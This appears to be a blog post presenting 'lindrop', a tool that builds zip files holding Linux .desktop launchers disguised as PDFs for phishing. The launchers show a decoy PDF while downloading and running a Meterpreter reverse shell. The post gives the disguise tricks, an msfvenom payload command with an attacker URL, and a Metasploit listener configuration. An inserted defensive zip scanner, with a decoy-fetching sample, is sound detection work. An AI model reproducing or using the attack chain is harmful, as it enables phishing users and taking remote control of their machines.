lindrop a social engineering vector for linux targets
A quick/dirty Python utility that generates a zip containing a “malicious” .desktop (aka shortcut) file that masquerades as a PDF file (not really, sort of). This is probably nothing new, but I needed a way to specifically target Linux users for certain social engineering engagements, where I could send a zip file via email and generate something on-the-fly. So I came up with this quick mess of a tool.
It basically exploits the “Exec” section of a .desktop file to:
1. Download a PDF and display it to the user.
2. Download and execute a linux/x86/meterpreter/reverse_tcp payload.
There’s some really old-school, basic obfuscation involved in the creation of the .desktop file. For one, the file name is generated with spaces between the .pdf and .desktop extensions. This is to hide the actual file extension when the .zip is just straight-up opened in Archive Manager:
Second, there’s a bunch of newlines (‘\n’) in the actual .desktop file itself, so if it is double-clicked from inside Archive Manager, nothing too obvious shows up unless you scroll all the way down (aside from the fact that it’s actually not a PDF, lol).
Another thing to note here: the “Icon” section. This contains a reference to a local SVG file which gives the .desktop shortcut an icon. In this case, we’re using an icon that’s typically included with GNOME and associated with PDF files. If this SVG file doesn’t exist on the target system, the file will look like an executable, blowing its amazing cover story of being a PDF file.
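From the defender’s side, the three disguise tricks just described (padded extension, newline padding before Exec, a launcher that fetches remote content and borrows a document icon) are all visible in the archive before anything is opened. The scanner below is an added example written for this post, not part of lindrop; the sample .desktop entry, the example.invalid host and the 20-blank-line threshold are constructed assumptions.

```python
import io
import re
import zipfile

# Heuristics for the disguise tricks the post describes: padded extension,
# newline padding before Exec, and a launcher fetching remote content via a shell.
PADDED_NAME = re.compile(r"\.(pdf|docx?|odt)\s+\.desktop$", re.IGNORECASE)
SHELL_FETCH = re.compile(r"\b(sh|bash|dash)\s+-c\b.*\b(wget|curl|fetch)\b")

def inspect_desktop_entry(name: str, content: str) -> list[str]:
    """Reasons an archive member looks like a launcher disguised as a document."""
    reasons = []
    if PADDED_NAME.search(name):
        reasons.append("document extension padded with spaces before .desktop")
    # Longest run of blank lines: a run of n newlines is n-1 blank lines.
    blank_run = max((len(r) for r in re.findall(r"\n{2,}", content)), default=1) - 1
    if blank_run >= 20:
        reasons.append(f"{blank_run} consecutive blank lines push Exec out of view")
    keys = dict(l.split("=", 1) for l in content.splitlines()
                if "=" in l and not l.startswith("#"))
    if SHELL_FETCH.search(keys.get("Exec", "")):
        reasons.append("Exec wraps a shell that downloads remote content")
    if keys.get("Type") == "Application" and "pdf" in keys.get("Icon", "").lower():
        reasons.append("Application launcher borrows a PDF document icon")
    return reasons

def scan_zip(data: bytes) -> dict[str, list[str]]:
    """Inspect every .desktop member of an in-memory zip; returns {member: reasons}."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.rstrip().lower().endswith(".desktop"):
                continue
            content = zf.read(info).decode("utf-8", errors="replace")
            if reasons := inspect_desktop_entry(info.filename, content):
                findings[info.filename] = reasons
    return findings

# Constructed sample (not from the post): a launcher that only fetches and shows a
# decoy PDF, i.e. the decoy half of the technique; host and paths are placeholders.
SAMPLE_DESKTOP = ("[Desktop Entry]\nType=Application\nName=Attendee Survey\n"
                  "Icon=application-pdf\n" + "\n" * 40 +
                  'Exec=sh -c "wget -q -O /tmp/temp.pdf http://example.invalid/survey.pdf; xpdf /tmp/temp.pdf"\n')

def build_sample_zip() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("survey.pdf            .desktop", SAMPLE_DESKTOP)
        zf.writestr("notes.txt", "plain text, ignored by the scanner\n")
    return buf.getvalue()
```

A mail gateway or download hook can run scan_zip over any attachment and quarantine on the first non-empty result; a .desktop entry inside an emailed zip has very few legitimate reasons to exist at all.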
Anyway, on to the tool.
Lindrop takes 4 inputs:
1. An output name for the “PDF” (.desktop) file that will be in the zip.
2. An output name for the ZIP file.
3. A remote payload URL (i.e., http://www.attacker.com/payload). This will be downloaded to the /tmp directory on the target box. For this example, we’re simply creating a payload with msfvenom:
   msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=listener_ip LPORT=listener_port -f elf > payload
4. A remote PDF to download and display to the user. In the case of this example, we’re remotely loading Black Hat 2016’s Attendee Survey: https://www.blackhat.com/docs/us-16/2016-Black-Hat-Attendee-Survey.pdf. Behind the scenes, Xpdf is used to open the PDF file.
You should end up with a zip file, all ready to send to your target:
Extracting the contents gives us a nice little quasi-“PDF” file:
Executing the file, from the perspective of the target, opens up (using Xpdf) the Black Hat survey (or a resume, or whichever PDF you tell it to download and open):
On the attacker side, we have a listener up using the following Metasploit resource file, waiting for a connection from the payload that the .desktop file downloaded and that we generated previously with msfvenom:
set ExitOnSession false
set LHOST 0.0.0.0
set LPORT 6666
set PAYLOAD linux/x86/meterpreter/reverse_tcp
Oh, this was all tested on the latest Kali Rolling, but it will probably work on most distros that handle .desktop files the same way. This code is probably buggy (it won’t take spaces in any of the inputs, and probably has other minor problems) and I’m sure it could be improved. At the moment, it just drops a “pl892” payload in the /tmp directory, along with the remote PDF file downloaded to /tmp/temp.pdf.
You can download lindrop here: